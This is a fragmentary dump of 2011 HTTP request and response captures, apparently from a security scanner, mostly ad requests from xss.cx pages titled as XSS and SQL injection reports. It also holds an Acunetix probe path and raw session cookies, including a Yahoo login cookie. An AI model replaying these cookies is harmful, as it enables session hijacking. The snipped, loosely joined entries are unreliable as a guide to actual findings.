HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 01:45:35 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4354
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303801135&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Flearnbridgefrontcom%2Fdom-based-xss-cross-site-scripting-capec86-cwe-79-dork-ghdb-report-example-poc.html&dt=1303783135631&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303783135647&frm=0&adk=1607234649&ga_vid=121072238.1303783136&ga_sid=1303783136&ga_hid=1656635059&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=44&xpc=XMjcqaQePY&p=file%3A// HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 01:58:46 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4411
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842148&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Floginsisnacom%2Fsql-injection-reflected-xss-cross-site-scripting-example-poc-report.html&dt=1303824177558&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303824177842&frm=0&adk=1607234649&ga_vid=1808494997.1303824179&ga_sid=1303824179&ga_hid=1628715820&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=983&fu=0&ifi=1&dtd=1085&xpc=lKRtWE6YsY&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 13:22:50 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12388
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/loginsisnacom/sql-injection-reflected-xss-cross-site-scripting-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DWebsaint%2BPro%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26gl%3DUS&usg=AFQjCNHT3dfouqC0FAf7-guruivEZ04CpA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842649&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Fsql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm&dt=1303824803488&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303824803807&frm=0&adk=1819763764&ga_vid=61520569.1303824806&ga_sid=1303824806&ga_hid=858233649&ga_fc=0&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=983&fu=0&ifi=1&dtd=2142&xpc=13iO88Ie8c&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 13:33:15 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12669
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/sql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.attunity.com/odbc-drivers%26adT%3DSybase%2BJDBC%2BDrivers%26adU%3Dwww.datadirect.com/ODBC%26adT%3DODBC%2Bto%2BSQL%2BServer%26gl%3DUS&usg=AFQjCNHIJs1CpBoknHCcAJrFv4s650n0zg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842217&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Fsql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm&dt=1303824238989&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303824239002&frm=0&adk=1819763764&ga_vid=1347859482.1303824239&ga_sid=1303824239&ga_hid=1668850280&ga_fc=0&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=981&bih=999&fu=0&ifi=1&dtd=18&xpc=GYTxhA8OUl&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 13:23:50 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12755
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/sql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.attunity.com/jdbc-drivers%26adT%3DDownload%2BJDBC%2BDB2%2BDrivers%26adU%3Dwww.datadirect.com/ODBC%26adT%3DODBC%2Bto%2BSQL%2BServer%26gl%3DUS&usg=AFQjCNHNiCawfuBfECFVMPxV01FoxST2Fg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303800256&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-wwwgenbookcom.htm&dt=1303782297447&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303782297498&frm=0&adk=1819763764&ga_vid=190606745.1303782298&ga_sid=1303782298&ga_hid=647492866&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=151&xpc=ZxjtlC7jU7&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 01:44:48 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 4307
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 11:34:18 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12842
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.IBM.com/SPSS_data_mining%26adT%3DSPSS%2BData%2BMining%2BPaper%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&usg=AFQjCNGRwIG6EbY0lr1eDa6-8mZiaMD60Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835928&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Freflected-xss-account.snap.com_443.htm&dt=1303824230280&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303824230285&frm=0&adk=1819763764&ga_vid=1237966377.1303824230&ga_sid=1303824230&ga_hid=422216691&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=981&bih=999&fu=0&ifi=1&dtd=9&xpc=YkFd6W5Msn&p=http%3A//xss.cx HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 26 Apr 2011 13:23:41 GMT Server: cafe Cache-Control: private X-XSS-Protection: 1; mode=block Content-Length: 12235
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s ...[SNIP]... <div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/reflected-xss-account.snap.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.manageengine.com%26adT%3Dsybase%2Bmonitoring%26adU%3Dwww.attunity.com/jdbc-drivers%26adT%3DDownload%2BJDBC%2BDB2%2BDrivers%26gl%3DUS&usg=AFQjCNH0dQhXTmwThOKPUN0U0gd5OKJvXA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a> ...[SNIP]... </script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script> ...[SNIP]...
<!DOCTYPE html><html lang="en" ><meta charset="utf-8" /><title>Oops! This link appears to be broken - seg.sharethis.com/AcuNginxTest662981.txt/acunetix.php</title><script type="text/javascript">(funct ...[SNIP]... <li>Go to <a href="http://sharethis.com/" onmousedown="return rwctrd(this,'dm','0','http://www.google.com/url?sa=D&q=http://sharethis.com/&usg=AFQjCNEXPKE-n7BWaDoS4rCOES9JwAALJQ');"><b> ...[SNIP]...
GET /config/login?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1 Host: login.yahoo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=08QxMuCE5xcRp6XxvP9UqQQVFjUnPTRIkxcDabYECLHYlgjWjedO.aMI9RGj2l09q.GrzSj0ZGNpKWL4tC5RhhHyRxFHPlU.kFCMEd44rNZiy50Es8NrBu7yXU0mNtf0YtrWeEjpo31kxbqrG0YGBvIbxraTXVC9nbjUpNtv9aXJppMZot2l11h5_ZSFAPhtqxX_6SVAEVGb0NKTjuEX9ZYv2zDAxiWP9cGTqFS0cy9sv336lSqBJx7SukerpgGajbVm5ixswV527gxjaF3uyCr7m1vg_4ERgH_kHGmM1GC3lZg7kpdA4se.Qgpe8f7RJkYS8crdx364dtmP6Js16W8_gxE1rMXJs1u9F8J4fm3eQRNc_54_vpkaiaTqfiqOcFZODhj_ghb_GOxG1FWZmW.i2zsaspuKA4yive5ZswfNSY0PlT8WhNaRhUIxTsKui8a4VYdjdz.5HLTMtIko4yhA
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:55:23 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 42663
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://threats2.paretologic.safecart.com/pcha/download?3562113">here</a> ...[SNIP]...
<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script> ...[SNIP]... </div> <script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf"></script> <noscript> <iframe src="http://www.google.com/recaptcha/api/noscript?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf" height="300" width="500" frameborder="0"></iframe> ...[SNIP]... <td width="100%"><iframe name="check_frame" width="318" height="199" src="http://www.spruzme.com/files/apps/geolocator/frame.asp" style="display:none;"> Your browser does not support inline frames or is currently configured not to display inline frames. </iframe> ...[SNIP]...
<a name="cardsFinder_2" id="cardsFinder_id_2" class="productTitle" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJ8B" target="_self" title="Bank of America Accelerated Rewards American Express Card"> Bank of America<sup style="vertical-align: text-top; font-size: 77%"> ...[SNIP]... <div class="clear">
jsonp1303820701740({widgetdata:[{htmlsrc:' <!-- sm1.2one --> <div class="links-list-module"> <div class="column-co ...[SNIP]... </div> <a href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABILO&cm_sp=Cons-CC-_-CMS_Defaults_Q2_2011-_-CC14CH0001_BHP-Def-Hero_dep-101_mh2_cr_state_arn2h2d4_o.jpg" name="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Rewards™. Get Started" target="_self" title="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Rewards™. Get Started" > <img src="/content/images/ContextualSiteGraphics/Marketing/Heroes/en_US/dep-101_mh2_cr_state_arn2h2d4_o.jpg" alt="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Reward ...[SNIP]...
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsatweb&P2=unified+threat+management&P3=0&P4=QBLH&P5=B506C07761D7465D924574124E3C14DF&P6=Washington, District Of Columbia&P9=38.906898498%2f-77.028396606&P10=0&P11=http%3a%2f%2fwww.bing.com%2f&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dunified+threat+management%26go%3d%26qs%3dn%26sk%3d%26FORM%3dFEEDTU
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsatweb&P2=email+spam+virus&P3=0&P4=QBRE&P5=B506C07761D7465D924574124E3C14DF&P6=Washington, District Of Columbia&P9=38.906898498%2f-77.028396606&P10=0&P11=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dunified%2bthreat%2bmanagement%26go%3d%26form%3dQBLH%26qs%3dn%26sk%3d&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3demail+spam+virus%26go%3d%26qs%3dn%26sk%3d%26sc%3d8-4%26FORM%3dFEEDTU
https://feedback.live.com/default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsatweb&P2=spam+virus+block&P3=0&P4=QBRE&P5=B506C07761D7465D924574124E3C14DF&P6=Washington, District Of Columbia&P9=38.906898498%2f-77.028396606&P10=0&P11=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3demail%2bspam%2bvirus%26go%3d%26form%3dQBRE%26qs%3dn%26sk%3d%26sc%3d8-4&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dspam+virus+block%26go%3d%26qs%3dn%26sk%3d%26sc%3d8-10%26FORM%3dFEEDTU
/** * All functions have been moved to product.functions.js * This is because this file was used in the control panel as well as the front end, but the * below initialization code is only meant for ...[SNIP]... </param>' + '<embed src="http://www.youtube.com/v/' + videoId + '?&fs=1&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="320" height="265"></embed> ...[SNIP]... </param>' + '<embed src="http://www.youtube.com/v/' + videoId + '?&fs=1&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed> ...[SNIP]...
GET /ads/?t=i&f=j&p=5112&pl=bb9cfe77&rnd=81239918339997540&clkurl=http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ../referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; 